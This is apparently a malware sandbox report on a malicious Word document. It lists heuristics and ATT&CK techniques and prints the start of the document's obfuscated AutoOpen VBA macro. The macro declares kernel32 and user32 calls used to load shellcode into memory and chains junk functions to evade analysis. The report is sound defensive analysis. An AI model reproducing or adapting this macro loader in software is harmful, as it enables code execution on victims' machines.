Verdict: MALICIOUS (Risk Score: 82)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that is set to execute automatically upon opening (AutoOpen). The macro's code is heavily obfuscated and uses Windows API calls, suggesting it is designed to download and execute a secondary payload. The presence of the AutoOpen marker and the VBA macros strongly indicates a macro-based attack, commonly delivered via spearphishing attachments.
Heuristics (4)
- VBA macros detected (medium, 1 related finding) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 78601 bytes |

SHA-256: a067f62fb024d0ae0868b98676f233d90f388d6cb4968a08d4cf12ab234d7eee

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function frQ2nU9d0N Lib "USEr32" Alias "EnumPropsA" (ByVal OK22JHyuwR As LongPtr, ByVal IWcsVDI9Ob As LongPtr) As Long
Private Declare PtrSafe Function Dl3ftAeOshvjLj Lib "USEr32" Alias "GetDesktopWindow" () As LongPtr
Private Declare PtrSafe Function J5axIxPsYk Lib "USEr32" Alias "SetPropA" (ByVal Mv0v4wc5MZKr As LongPtr, ByVal ip8YLD2iUwT As String, ByVal acIQLvnCK As LongPtr) As Long
Private Declare PtrSafe Function E4lxBzceDX8WN8 Lib "KERnel32" Alias "HeapCreate" (ByVal EAo As Long, ByVal OGTR2KL8bN6id As LongPtr, ByVal nOXIjAj As LongPtr) As LongPtr
Private Declare PtrSafe Function jXBkDHX9dfN92IgZXc3mAPJUV Lib "KERnel32" Alias "HeapAlloc" (ByVal pLXFyS As LongPtr, ByVal u6st3I As Long, ByVal Sw8HenuXgtx4 As LongPtr) As LongPtr
Private Declare PtrSafe Sub VUVPzRdYYpl5kAsPxJ Lib "KERnel32" Alias "RtlMoveMemory" (VmG3 As Any, ByRef xDd6 As Any, ByVal mVivQM As Long)
#Else
Private Declare Function frQ2nU9d0N Lib "USEr32" Alias "EnumPropsA" (ByVal C47viJXQWDgjQT As Long, ByVal GOsJs As Long) As Long
Private Declare Function Dl3ftAeOshvjLj Lib "USEr32" Alias "GetDesktopWindow" () As Long
Private Declare Function J5axIxPsYk Lib "USEr32" Alias "SetPropA" (ByVal Q3HV As Long, ByVal pEYwNsw As String, ByVal iNtGfeBY81 As Long) As Long
Private Declare Function E4lxBzceDX8WN8 Lib "KERnel32" Alias "HeapCreate" (ByVal jI6OKVAGD As Long, ByVal dSKj As Long, ByVal baP As Long) As Long
Private Declare Function jXBkDHX9dfN92IgZXc3mAPJUV Lib "KERnel32" Alias "HeapAlloc" (ByVal lw25uQd9AIB As Long, ByVal SKSmJEy As Long, ByVal taaADLbBx33 As Long) As Long
Private Declare Sub VUVPzRdYYpl5kAsPxJ Lib "KERnel32" Alias "RtlMoveMemory" (lLn3zhGoO2 As Any, ByRef otulWFRiMxLXS As Any, ByVal tMJoy3IE As Long)
#End If
Sub autOOpEN()
Call IJK9ljmAnDLdW
End Sub
Static Function IJK9ljmAnDLdW() As Long
Call WQSMwk2TQDmhY6h5qndAY3
End Function
Private Function WQSMwk2TQDmhY6h5qndAY3() As String
Call HWM3Q0iHgO13PkDD2zZE
End Function
Public Function HWM3Q0iHgO13PkDD2zZE() As Object
Call zQPmsMnYCgubrJiv32eHmK
End Function
Static Function zQPmsMnYCgubrJiv32eHmK() As Object
Call vw6TqwrRUSTP5yzPfDQZ
End Function
Function vw6TqwrRUSTP5yzPfDQZ() As Double
Call Byk5zymrVEO3PyfP3Yf0QFZr
End Function
Static Function Byk5zymrVEO3PyfP3Yf0QFZr() As Integer
Call StzGFiEGf3yMT4vM79iqfCOb
End Function
Static Function StzGFiEGf3yMT4vM79iqfCOb() As Variant
Call WucY5XYoreyFxaKxEmslHzg
End Function
Static Function WucY5XYoreyFxaKxEmslHzg() As Currency
Call GcibIK70E20V
End Function
Static Function GcibIK70E20V() As Currency
Call qPSTmwn3p9PRCOI
End Function
Private Function qPSTmwn3p9PRCOI() As Boolean
Call p4pAIYSJLapmLbOvcRim
End Function
Sub p4pAIYSJLapmLbOvcRim()
Call prWYVwjGRXF9yxAX8a9ll2Y
End Sub
Function prWYVwjGRXF9yxAX8a9ll2Y() As String
Call tMdkgyBpkWr
End Function
Public Function tMdkgyBpkWr() As Byte
Call Is0xiJWBgVLrzSzl
End Function
Private Function Is0xiJWBgVLrzSzl() As Variant
Call umm4vF6EvaI
End Function
Function umm4vF6EvaI() As Long
Call JleKqq5PzJxrepJXzob
End Function
Static Function JleKqq5PzJxrepJXzob() As Currency
Call hGbkPlK0yEcuvr
End Function
Private Function hGbkPlK0yEcuvr() As Single
Call K3Xuy4KdI5
End Function
Public Function K3Xuy4KdI5() As String
Call HnTxlVIblcV1IeR0zSG4o
End Function
Function HnTxlVIblcV1IeR0zSG4o() As Object
Call KOR3pJDJKQS6C29H
End Function
Static Function KOR3pJDJKQS6C29H() As Currency
Call p4wsp5X8bXY6vv66fRp4MsZ
End Function
Public Function p4wsp5X8bXY6vv66fRp4MsZ() As Object
Call pBZX5dOGNhPqbUk0aDX6
End Function
Static Function pBZX5dOGNhPqbUk0aDX6() As Integer
Call iL9KZbiElAtoqKhRApbzND
End Function
Private Function iL9KZbiElAtoqKhRApbzND() As Currency
Call Ikd7FxvnkjZQMRu2Rs93Vq9xH
End Functio
... (truncated)
```